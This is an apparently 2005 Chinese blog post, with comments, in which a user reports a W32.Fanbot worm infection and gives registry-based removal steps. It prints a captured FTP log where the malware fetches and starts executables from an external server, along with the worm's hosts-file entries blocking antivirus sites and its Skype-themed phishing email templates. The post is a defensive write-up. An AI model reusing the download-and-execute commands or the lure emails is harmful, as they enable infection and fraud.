2005年12月08日 星期四

我变成了肉鸡?

今天回家打开电脑后去吃饭,回来看到cmd.exe被启动了。竟然通过我的ftp.exe抓了些坏东西到我的机器上。 不过 奇怪的是,ftp抓包后,不知道为什么没关掉cmd窗口。坏东西在系统temp目录下有几个sqlscan.exe sqlexp.exe etc.文件,sqlscan是sql server的密码穷举软件。通过使用特定字典档扫描特定的ip段,拿到sql server的root权限,基本上sql server的root权限跟win os的亲密关系,如果你的sql被夺权了,你的pc也就变成一台不折不扣的肉鸡了。
不知道这些不请自来的不速客是哪个缝里进来的。怀疑从emule(电驴) hack进来的可能性最大。从其它开着的程序(比如 msn/ gtalk /skype /google /desktop /sidebar/ )的可能性并不大。暂时只把ftp.exe的所有权限都去掉。把temp里面的程序全部清除。如果有类似经历者,可以告诉我正解。
ps:[E-v-i-l_S-e-c-u-r-i-t-y_T-e-a-m]是个国内的craker team?

Modify 2005-12-11 20:49
基本确定为Worm@W32.Fanbot这个蠕虫.利用了这个windows的漏洞先下载补丁。此蠕虫会在修改注册表记录如下。

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RpcRemotes
"ImagePath" = "%System%\remote.exe"
"DisplayName" = "Remote Procedure Call (RPC) Remote"
"Type" = "110"
"Start" = "2"
"ErrorControl" = "1"
"ObjectName" = "LocalSystem"

这整个节点记录可以全部清除。另外保证 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RpcSs 节点的 start 参数为2,

即自动启动,而不是4,禁用。因为那个remote.exe会伪装成RPC的基本服务而屏蔽原来的RPC。

这点请注意,因为这个服务跟其他服务依存度很高,很多重要服务都依赖于此服务。(修改注册表前请注意备份。)

修改后即可重新启动机器。然后可把%system%下面的remote.exe删除或者移动到其他文件夹。具体说明请阅读全文

记录cmd.exe的ftp 记录如下
C:\WINNT\system32>ftp.exe -s:x
ftp> open 61.138.10.55 21211
Connected to 61.138.10.55.
220-___--->>>[E-v-i-l_S-e-c-u-r-i-t-y_T-e-a-m]<<<---___
220-______________________________________________
220-
220-This Server is running since 1 days and 5:39 hours,
220-and has been accessed 771 times, 397 in the last 24 hours.
220-There are now 31 users logged in, Max allowed : Unlimited.
220-______________________________________________
220-
220-Free Disk Space : 1096.71 MB
220-Downloaded : 103404 Kb in 1390 Files
220-Uploaded : 178 Kb in 2 Files
220-Current Speed : 44.284 Kb/sec
220-Average Speed : 0.970 Kb/sec
220-______________________________________________
220 
User (61.138.10.55:(none)):
331 User name okay, need password.

230 User logged in, proceed.
ftp>
ftp> bin
200 Type set to I.
ftp> get x.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for x.exe (19976 Bytes).
226 Transfer complete.
ftp: 19976 bytes received in 8.11Seconds 2.46Kbytes/sec.
ftp> get y.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for y.exe (30506 Bytes).
226 Transfer complete.
ftp: 30506 bytes received in 6.33Seconds 4.82Kbytes/sec.
ftp> get z.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for z.exe (85394 Bytes).
226 Transfer complete.
ftp: 85394 bytes received in 51.56Seconds 1.66Kbytes/sec.
ftp> bye
221 Goodbye!

C:\WINNT\system32>del x

C:\WINNT\system32>START x.exe

C:\WINNT\system32>START y.exe

C:\WINNT\system32>START z.exe

C:\WINNT\system32>del x.bat
找不到批处理文件。

Worm@W32.Fanbot

Fanbot 骇虫散播一封某知名网络电话通讯软件的邮件,诱使客户运行安装此软件

Fanbot 骇虫会传送某知名网络电话通讯软件的电子邮件,欺骗客户附加文件即是该软件,当客户运行后就会被感染,此骇虫会开启后门程序并允许骇客进行攻击,也会透过点对点网络散播,并复制病毒本身到分享资料夹中。

基本介绍

病毒名称 Worm@W32.Fanbot
病毒别名 W32/Fanbot-H [Sophos], WORM_FANBOT.A [Trend Micro],W32.Fanbot.A@mm[symantec]
病毒型态 Worm , E-Mail , Backdoor
病毒发现日期 2005/10/18

利用漏洞

 MS05-039(英文)
MS05-039(中文)
影响平台 Windows 95/98/ME , Windows NT/2000/XP/2003

风险评估

散播程度:高
破坏程度:中

Worm@W32.Fanbot信件格式:

发信者: < 下列任一个 >
noreply@[RECIPIENT MAIL DOMAIN]
webmaster@[RECIPIENT MAIL DOMAIN]
register@[RECIPIENT MAIL DOMAIN]
info@[RECIPIENT MAIL DOMAIN]
admin@[RECIPIENT MAIL DOMAIN]
...........

主旨: < 下列任一个 >
Share Skype.
What is Skype?
Skype for Windows 1.4 - Have you got the new Skype?
Hello. We're Skype and we've got something we would like to share with you.
Your Account is Suspended.
................

内文: < 下列任一个 >
Dear [USER NAME],
Skype is a little piece of software that lets you talk over the Internet
to anyobe, anywhere for free.
And it just got even better -- download the latest version of Skype:
Our call quality is the best ever for talking, laughing and sharing stories.
You can forward calls on to mobiles, landlines and other Skype Names.
Make calls instantly from Outlook email or Internet Explorer with our
new toolbars.
Personalise your Skype -- play around with sounds, ringtones and pictures
to show the world who you are.
For further details see the attached document.
This message contains graphics. If you do not see the graphics, click
here to view.
(C) 2002-2005 by Skype Technologies S.A.
Legal Information
Note: The characters "--" are displayed as a dash on a Chinese langauge OS, but may be displayed differently in other language versions of the OS.


Dear user [USER NAME],
You have successfully updated the password of your [DOMAIN NAME] account.
If you did not authorize this change or if you need assistance with your
account, please contact [DOMAIN NAME] customer service at: [SPOOFED EMAIL
ADDRESS WITH DOMAIN NAME]
Thank you for using [DOMAIN NAME]!
The [DOMAIN NAME] Support Team

+++ Attachment: No Virus (Clean)
+++ [DOMAIN NAME] Antivirus - www.[DOMAIN NAME]

................

附加文件: < 下列任一个 >
Skype-stuffs.zip
Skype-info.zip
Skype-details.zip
Skype.zip
Skype for Windows 1.4.zip

...........


Worm@W32.Fanbot 行为描述:

注:在Win95/98/me %System% 默认值为 C:\windows\System

在WinNT/2000/XP/2003 %System% 系统默认值为 C:\WinNT\System32

  • 显示一个错误消息:

    •

    标题:Error

    内容:The file could not be opened!

  • 生成一个系统服务:

    •

    Display Name: Remote Procedure Call (RPC) Remote

    Image Path: %System%\remote.exe

    Type: Automatic

  • 开启后门程序并允许骇客运行下列行为:

    •

    下载并运行文件

    取得系统信息

    更新骇虫

    启动或停止邮寄

  • 骇虫试图透过点对点网络散播,且会复制到含有下列字串的资料夹:

    •

    share

    sharing

    incoming

    download

    bak

    .........

  • 骇虫使用下列文件名:

    •

    1001 Sex and more.rtf.exe

    3D Studio Max 6 3dsmax.exe

    ACDSee 10.exe

    AcrobatReader_New.exe

    activation_crack.exe

    ..............

  • 添加下列说明至主机文件,以防止访问安全性相关网站:

    •

    Play with the best, Die like the rest.

    [Phantom] 2005 made by [REMOVED]. Special Thanks:[REMOVED].

    If u have [REMOVED]'s SourceCode, please u mail it to me!!! E-mail:[REMOVED]@Gmail.Com thanks!!!

    0.0.0.0 jiangmin.com

    0.0.0.0 www.jiangmin.com

    0.0.0.0 Update2.JiangMin.com

    0.0.0.0 Update3.JiangMin.com

    0.0.0.0 rising.com.cn

    0.0.0.0 www.rising.com.cn

    ................

  • 终止安全性相关程序:

    •

    A2HIJACKFREE.EXE

    ADAM.EXE

    AGTX0404.EXE

    AGTX0411.EXE

    AGTX0804.EXE

    .............

  • 透过病毒运行后,将骇虫本身复制到%System%

    •

    remote.exe

  • 更改登录档,如此开机即会启动骇虫。

    •

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RpcRemotes

    [technorati relative tag]

    [相关内容]

    由 tristones 发表于 2005年12月08日 下午09時42分

    留言

    你好 我的机器 也发生了 和你一样的情况 怎么 解决啊?望指教!

    Posted by: zhurui 发表于 2005年12月10日 下午12時42分

    我暂时只是把%windows%/system32 目录下的ftp.exe的所有权限关闭,任何人都无法使用此程序。把%windows$/temp目录清空。
    你是否也有运行emule,并连到了特定的服务器。我发现我的emule会自动连接到国内的一组服务器,而不是我指定的razorbak2

    Posted by: tristones 发表于 2005年12月10日 下午02時47分

    我也一样,
    请求办法

    Posted by: pines 发表于 2005年12月10日 下午02時59分

    这么简单处理是没用的,
    看看你的进程列表里是不是有一个remote.exe,那是黑客的木马。

    Posted by: spark 发表于 2005年12月10日 下午04時18分

    到底怎么 办呢 我 用防火墙 不知是否档住

    Posted by: zhurui 发表于 2005年12月10日 下午06時05分

    我的问题不是remote.exe引起的,猜测最可能的原因是emule造成,我要确知有问题的几位是否也开着emule并会被强制连接到特定的服务器?
    可以先查一下sqlexp.exe等可能的文件在注册表是否有记录,这个木马是一个dll文件,我清除可能的问题文件之后,似乎只要不开emul就没有问题。开了也没什么可怕的。:)

    Posted by: tristones 发表于 2005年12月11日 上午10時07分

    我的也是这个问题!不过我的没有安装EM,进程里有一个remote.exe,另外中毒的时候还有一个SQLTOB。EXE程序在运行,我把这个结束之后就好了!

    Posted by: xw 发表于 2005年12月12日 上午04時43分

    Modify 2005-12-11 20:49
    基本确定为Worm@W32.Fanbot这个蠕虫.利用了这个windows的漏洞,先下载补丁。此蠕虫会在修改注册表记录如下。

    我是做无盘网吧系统的,近来我发现有近十家左右的网吧这两天中了这种病毒!在进程里多了两个程序:sqltob.exe sqlexp.exe. 在%system%\temp目录里多了几个文件.还出现顶楼兄弟说的一模一样的CMD.EXE窗口内容.我用瑞星.北信源都杀不出病毒.好像中了这种毒后,瑞星就失效了.我怀疑是我下的瑞星升级包有问题,或是瑞星公司搞的鬼!兄弟你们怎么看?

    Posted by: 我心最酷 发表于 2005年12月12日 下午02時24分

    对了.还没说完的.
    上面兄弟说到是:Worm@W32.Fanbot病毒.可我2K系统里已经打过MS05-039(中文) 补丁了.但还是一样的中了呀!!!

    Posted by: 我心最酷 发表于 2005年12月12日 下午02時34分

    他就是利用了即插即用服务的远程写入漏洞并可提升权限(应该可以轻易拿到admin权限),这个漏洞可能引发的危害相当大。补丁先打好再说吧。瑞星从来不用,用Sophos,Tr Micro,symantec的杀毒工具应该都可以有效检测到。我用的卡巴虽然检测到了,不过似乎杀得不彻底。看来,这个蠕虫波及面还不小。
    另外,我这个清除的方法可能并不彻底。

    Posted by: tristones 发表于 2005年12月12日 下午02時45分